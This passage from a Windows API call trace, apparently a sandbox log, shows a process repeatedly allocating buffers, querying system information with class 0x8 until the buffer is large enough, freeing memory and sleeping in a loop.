NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0305.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.753] Sleep (dwMilliseconds=0x110) [0305.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0305.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0305.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0305.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0305.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0305.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0305.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0305.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0305.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.768] Sleep (dwMilliseconds=0x110) [0305.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0305.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0305.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0305.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0305.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0305.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0305.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0305.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0305.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.783] Sleep (dwMilliseconds=0x110) [0305.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0305.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0305.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0305.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0305.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0305.802] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0305.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0305.802] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0305.803] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.804] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.804] Sleep (dwMilliseconds=0x110) [0305.809] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0305.809] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0305.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0305.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0305.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0305.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0305.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0305.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0305.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.813] Sleep (dwMilliseconds=0x110) [0305.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0305.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0305.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0305.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0305.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0305.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0305.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0305.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0305.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.834] Sleep (dwMilliseconds=0x110) [0305.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0305.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.841] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0305.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0305.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0305.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0305.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0305.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0305.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0305.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.849] Sleep (dwMilliseconds=0x110) [0305.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0305.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0305.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0305.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0305.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0305.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0305.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0305.864] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0305.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.866] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.866] Sleep (dwMilliseconds=0x110) [0305.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0305.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0305.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0305.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0305.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0305.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0305.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0305.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0305.881] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.882] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.882] Sleep (dwMilliseconds=0x110) [0305.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0305.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0305.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0305.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0305.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0305.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0305.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0305.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0305.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.891] Sleep (dwMilliseconds=0x110) [0305.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0305.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0305.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0305.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0305.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0305.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0305.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0305.912] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0305.913] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.914] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.914] Sleep (dwMilliseconds=0x110) [0305.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0305.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0305.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0305.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0305.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0305.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0305.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0305.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0305.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.923] Sleep (dwMilliseconds=0x110) [0305.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0305.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0305.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0305.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0305.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0305.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0305.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0305.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0305.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.943] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.943] Sleep (dwMilliseconds=0x110) [0305.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0305.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0305.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0305.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0305.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0305.958] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0305.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0305.959] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.960] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0305.960] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.960] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.961] Sleep (dwMilliseconds=0x110) [0305.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0305.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.966] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0305.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0305.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0305.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0305.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.967] HeapFree (in: 